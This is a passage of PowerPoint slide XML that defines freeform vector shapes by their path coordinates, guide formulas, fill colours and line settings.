                      <a:pt x="183" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="57"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="4" y="103"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="4" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="103"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36283" name="Freeform 15"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5092" y="3013"/>
                <a:ext cx="63" cy="32"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 20 w 63"/>
                  <a:gd name="T1" fmla="*/ 32 h 32"/>
                  <a:gd name="T2" fmla="*/ 19 w 63"/>
                  <a:gd name="T3" fmla="*/ 31 h 32"/>
                  <a:gd name="T4" fmla="*/ 17 w 63"/>
                  <a:gd name="T5" fmla="*/ 29 h 32"/>
                  <a:gd name="T6" fmla="*/ 15 w 63"/>
                  <a:gd name="T7" fmla="*/ 28 h 32"/>
                  <a:gd name="T8" fmla="*/ 12 w 63"/>
                  <a:gd name="T9" fmla="*/ 30 h 32"/>
                  <a:gd name="T10" fmla="*/ 9 w 63"/>
                  <a:gd name="T11" fmla="*/ 27 h 32"/>
                  <a:gd name="T12" fmla="*/ 7 w 63"/>
                  <a:gd name="T13" fmla="*/ 26 h 32"/>
                  <a:gd name="T14" fmla="*/ 2 w 63"/>
                  <a:gd name="T15" fmla="*/ 24 h 32"/>
                  <a:gd name="T16" fmla="*/ 0 w 63"/>
                  <a:gd name="T17" fmla="*/ 22 h 32"/>
                  <a:gd name="T18" fmla="*/ 2 w 63"/>
                  <a:gd name="T19" fmla="*/ 20 h 32"/>
                  <a:gd name="T20" fmla="*/ 4 w 63"/>
                  <a:gd name="T21" fmla="*/ 21 h 32"/>
                  <a:gd name="T22" fmla="*/ 9 w 63"/>
                  <a:gd name="T23" fmla="*/ 20 h 32"/>
                  <a:gd name="T24" fmla="*/ 13 w 63"/>
                  <a:gd name="T25" fmla="*/ 21 h 32"/>
                  <a:gd name="T26" fmla="*/ 18 w 63"/>
                  <a:gd name="T27" fmla="*/ 22 h 32"/>
                  <a:gd name="T28" fmla="*/ 22 w 63"/>
                  <a:gd name="T29" fmla="*/ 21 h 32"/>
                  <a:gd name="T30" fmla="*/ 23 w 63"/>
                  <a:gd name="T31" fmla="*/ 20 h 32"/>
                  <a:gd name="T32" fmla="*/ 25 w 63"/>
                  <a:gd name="T33" fmla="*/ 16 h 32"/>
                  <a:gd name="T34" fmla="*/ 26 w 63"/>
                  <a:gd name="T35" fmla="*/ 17 h 32"/>
                  <a:gd name="T36" fmla="*/ 28 w 63"/>
                  <a:gd name="T37" fmla="*/ 20 h 32"/>
                  <a:gd name="T38" fmla="*/ 30 w 63"/>
                  <a:gd name="T39" fmla="*/ 21 h 32"/>
                  <a:gd name="T40" fmla="*/ 32 w 63"/>
                  <a:gd name="T41" fmla="*/ 21 h 32"/>
                  <a:gd name="T42" fmla="*/ 39 w 63"/>
                  <a:gd name="T43" fmla="*/ 20 h 32"/>
                  <a:gd name="T44" fmla="*/ 41 w 63"/>
                  <a:gd name="T45" fmla="*/ 18 h 32"/>
                  <a:gd name="T46" fmla="*/ 44 w 63"/>
                  <a:gd name="T47" fmla="*/ 13 h 32"/>
                  <a:gd name="T48" fmla="*/ 46 w 63"/>
                  <a:gd name="T49" fmla="*/ 11 h 32"/>
                  <a:gd name="T50" fmla="*/ 50 w 63"/>
                  <a:gd name="T51" fmla="*/ 11 h 32"/>
                  <a:gd name="T52" fmla="*/ 52 w 63"/>
                  <a:gd name="T53" fmla="*/ 10 h 32"/>
                  <a:gd name="T54" fmla="*/ 52 w 63"/>
                  <a:gd name="T55" fmla="*/ 8 h 32"/>
                  <a:gd name="T56" fmla="*/ 52 w 63"/>
                  <a:gd name="T57" fmla="*/ 4 h 32"/>
                  <a:gd name="T58" fmla="*/ 52 w 63"/>
                  <a:gd name="T59" fmla="*/ 0 h 32"/>
                  <a:gd name="T60" fmla="*/ 55 w 63"/>
                  <a:gd name="T61" fmla="*/ 2 h 32"/>
                  <a:gd name="T62" fmla="*/ 58 w 63"/>
                  <a:gd name="T63" fmla="*/ 2 h 32"/>
                  <a:gd name="T64" fmla="*/ 60 w 63"/>
                  <a:gd name="T65" fmla="*/ 0 h 32"/>
                  <a:gd name="T66" fmla="*/ 63 w 63"/>
                  <a:gd name="T67" fmla="*/ 4 h 32"/>
                  <a:gd name="T68" fmla="*/ 63 w 63"/>
                  <a:gd name="T69" fmla="*/ 6 h 32"/>
                  <a:gd name="T70" fmla="*/ 62 w 63"/>
                  <a:gd name="T71" fmla="*/ 10 h 32"/>
                  <a:gd name="T72" fmla="*/ 61 w 63"/>
                  <a:gd name="T73" fmla="*/ 11 h 32"/>
                  <a:gd name="T74" fmla="*/ 57 w 63"/>
                  <a:gd name="T75" fmla="*/ 12 h 32"/>
                  <a:gd name="T76" fmla="*/ 56 w 63"/>
                  <a:gd name="T77" fmla="*/ 13 h 32"/>
                  <a:gd name="T78" fmla="*/ 57 w 63"/>
                  <a:gd name="T79" fmla="*/ 14 h 32"/>
                  <a:gd name="T80" fmla="*/ 60 w 63"/>
                  <a:gd name="T81" fmla="*/ 18 h 32"/>
                  <a:gd name="T82" fmla="*/ 58 w 63"/>
                  <a:gd name="T83" fmla="*/ 20 h 32"/>
                  <a:gd name="T84" fmla="*/ 56 w 63"/>
                  <a:gd name="T85" fmla="*/ 21 h 32"/>
                  <a:gd name="T86" fmla="*/ 50 w 63"/>
                  <a:gd name="T87" fmla="*/ 21 h 32"/>
                  <a:gd name="T88" fmla="*/ 47 w 63"/>
                  <a:gd name="T89" fmla="*/ 21 h 32"/>
                  <a:gd name="T90" fmla="*/ 47 w 63"/>
                  <a:gd name="T91" fmla="*/ 22 h 32"/>
                  <a:gd name="T92" fmla="*/ 44 w 63"/>
                  <a:gd name="T93" fmla="*/ 26 h 32"/>
                  <a:gd name="T94" fmla="*/ 42 w 63"/>
                  <a:gd name="T95" fmla="*/ 27 h 32"/>
                  <a:gd name="T96" fmla="*/ 35 w 63"/>
                  <a:gd name="T97" fmla="*/ 30 h 32"/>
                  <a:gd name="T98" fmla="*/ 32 w 63"/>
                  <a:gd name="T99" fmla="*/ 31 h 32"/>
                  <a:gd name="T100" fmla="*/ 26 w 63"/>
                  <a:gd name="T101" fmla="*/ 31 h 32"/>
                  <a:gd name="T102" fmla="*/ 20 w 63"/>
                  <a:gd name="T103" fmla="*/ 32 h 3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63"/>
                  <a:gd name="T157" fmla="*/ 0 h 32"/>
                  <a:gd name="T158" fmla="*/ 63 w 63"/>
                  <a:gd name="T159" fmla="*/ 32 h 3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63" h="32">
                    <a:moveTo>
                      <a:pt x="20" y="32"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="19" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="32"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36284" name="Freeform 16"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4972" y="2988"/>
                <a:ext cx="156" cy="127"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4 w 156"/>
                  <a:gd name="T1" fmla="*/ 78 h 127"/>
                  <a:gd name="T2" fmla="*/ 0 w 156"/>
                  <a:gd name="T3" fmla="*/ 63 h 127"/>
                  <a:gd name="T4" fmla="*/ 2 w 156"/>
                  <a:gd name="T5" fmla="*/ 0 h 127"/>
                  <a:gd name="T6" fmla="*/ 27 w 156"/>
                  <a:gd name="T7" fmla="*/ 8 h 127"/>
                  <a:gd name="T8" fmla="*/ 43 w 156"/>
                  <a:gd name="T9" fmla="*/ 13 h 127"/>
                  <a:gd name="T10" fmla="*/ 54 w 156"/>
                  <a:gd name="T11" fmla="*/ 19 h 127"/>
                  <a:gd name="T12" fmla="*/ 60 w 156"/>
                  <a:gd name="T13" fmla="*/ 19 h 127"/>
                  <a:gd name="T14" fmla="*/ 64 w 156"/>
                  <a:gd name="T15" fmla="*/ 24 h 127"/>
                  <a:gd name="T16" fmla="*/ 74 w 156"/>
                  <a:gd name="T17" fmla="*/ 30 h 127"/>
                  <a:gd name="T18" fmla="*/ 77 w 156"/>
                  <a:gd name="T19" fmla="*/ 42 h 127"/>
                  <a:gd name="T20" fmla="*/ 80 w 156"/>
                  <a:gd name="T21" fmla="*/ 45 h 127"/>
                  <a:gd name="T22" fmla="*/ 98 w 156"/>
                  <a:gd name="T23" fmla="*/ 51 h 127"/>
                  <a:gd name="T24" fmla="*/ 106 w 156"/>
                  <a:gd name="T25" fmla="*/ 53 h 127"/>
                  <a:gd name="T26" fmla="*/ 110 w 156"/>
                  <a:gd name="T27" fmla="*/ 58 h 127"/>
                  <a:gd name="T28" fmla="*/ 110 w 156"/>
                  <a:gd name="T29" fmla="*/ 63 h 127"/>
                  <a:gd name="T30" fmla="*/ 98 w 156"/>
                  <a:gd name="T31" fmla="*/ 65 h 127"/>
                  <a:gd name="T32" fmla="*/ 98 w 156"/>
                  <a:gd name="T33" fmla="*/ 69 h 127"/>
                  <a:gd name="T34" fmla="*/ 106 w 156"/>
                  <a:gd name="T35" fmla="*/ 79 h 127"/>
                  <a:gd name="T36" fmla="*/ 118 w 156"/>
                  <a:gd name="T37" fmla="*/ 93 h 127"/>
                  <a:gd name="T38" fmla="*/ 125 w 156"/>
                  <a:gd name="T39" fmla="*/ 101 h 127"/>
                  <a:gd name="T40" fmla="*/ 132 w 156"/>
                  <a:gd name="T41" fmla="*/ 101 h 127"/>
                  <a:gd name="T42" fmla="*/ 135 w 156"/>
                  <a:gd name="T43" fmla="*/ 102 h 127"/>
                  <a:gd name="T44" fmla="*/ 134 w 156"/>
                  <a:gd name="T45" fmla="*/ 108 h 127"/>
                  <a:gd name="T46" fmla="*/ 140 w 156"/>
                  <a:gd name="T47" fmla="*/ 109 h 127"/>
                  <a:gd name="T48" fmla="*/ 145 w 156"/>
                  <a:gd name="T49" fmla="*/ 111 h 127"/>
                  <a:gd name="T50" fmla="*/ 140 w 156"/>
                  <a:gd name="T51" fmla="*/ 114 h 127"/>
                  <a:gd name="T52" fmla="*/ 150 w 156"/>
                  <a:gd name="T53" fmla="*/ 117 h 127"/>
                  <a:gd name="T54" fmla="*/ 156 w 156"/>
                  <a:gd name="T55" fmla="*/ 125 h 127"/>
                  <a:gd name="T56" fmla="*/ 147 w 156"/>
                  <a:gd name="T57" fmla="*/ 127 h 127"/>
                  <a:gd name="T58" fmla="*/ 145 w 156"/>
                  <a:gd name="T59" fmla="*/ 122 h 127"/>
                  <a:gd name="T60" fmla="*/ 137 w 156"/>
                  <a:gd name="T61" fmla="*/ 121 h 127"/>
                  <a:gd name="T62" fmla="*/ 124 w 156"/>
                  <a:gd name="T63" fmla="*/ 118 h 127"/>
                  <a:gd name="T64" fmla="*/ 114 w 156"/>
                  <a:gd name="T65" fmla="*/ 118 h 127"/>
                  <a:gd name="T66" fmla="*/ 106 w 156"/>
                  <a:gd name="T67" fmla="*/ 114 h 127"/>
                  <a:gd name="T68" fmla="*/ 103 w 156"/>
                  <a:gd name="T69" fmla="*/ 108 h 127"/>
                  <a:gd name="T70" fmla="*/ 94 w 156"/>
                  <a:gd name="T71" fmla="*/ 103 h 127"/>
                  <a:gd name="T72" fmla="*/ 85 w 156"/>
                  <a:gd name="T73" fmla="*/ 90 h 127"/>
                  <a:gd name="T74" fmla="*/ 77 w 156"/>
                  <a:gd name="T75" fmla="*/ 84 h 127"/>
                  <a:gd name="T76" fmla="*/ 62 w 156"/>
                  <a:gd name="T77" fmla="*/ 79 h 127"/>
                  <a:gd name="T78" fmla="*/ 55 w 156"/>
                  <a:gd name="T79" fmla="*/ 80 h 127"/>
                  <a:gd name="T80" fmla="*/ 47 w 156"/>
                  <a:gd name="T81" fmla="*/ 77 h 127"/>
                  <a:gd name="T82" fmla="*/ 48 w 156"/>
                  <a:gd name="T83" fmla="*/ 84 h 127"/>
                  <a:gd name="T84" fmla="*/ 44 w 156"/>
                  <a:gd name="T85" fmla="*/ 84 h 127"/>
                  <a:gd name="T86" fmla="*/ 44 w 156"/>
                  <a:gd name="T87" fmla="*/ 88 h 127"/>
                  <a:gd name="T88" fmla="*/ 36 w 156"/>
                  <a:gd name="T89" fmla="*/ 89 h 127"/>
                  <a:gd name="T90" fmla="*/ 24 w 156"/>
                  <a:gd name="T91" fmla="*/ 88 h 127"/>
                  <a:gd name="T92" fmla="*/ 28 w 156"/>
                  <a:gd name="T93" fmla="*/ 90 h 127"/>
                  <a:gd name="T94" fmla="*/ 37 w 156"/>
                  <a:gd name="T95" fmla="*/ 93 h 127"/>
                  <a:gd name="T96" fmla="*/ 41 w 156"/>
                  <a:gd name="T97" fmla="*/ 99 h 127"/>
                  <a:gd name="T98" fmla="*/ 33 w 156"/>
                  <a:gd name="T99" fmla="*/ 103 h 127"/>
                  <a:gd name="T100" fmla="*/ 25 w 156"/>
                  <a:gd name="T101" fmla="*/ 104 h 127"/>
                  <a:gd name="T102" fmla="*/ 4 w 156"/>
                  <a:gd name="T103" fmla="*/ 103 h 127"/>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56"/>
                  <a:gd name="T157" fmla="*/ 0 h 127"/>
                  <a:gd name="T158" fmla="*/ 156 w 156"/>
                  <a:gd name="T159" fmla="*/ 127 h 127"/>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56" h="127">
                    <a:moveTo>
                      <a:pt x="4" y="103"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="4" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="46"/>
                    </a:lnTo>
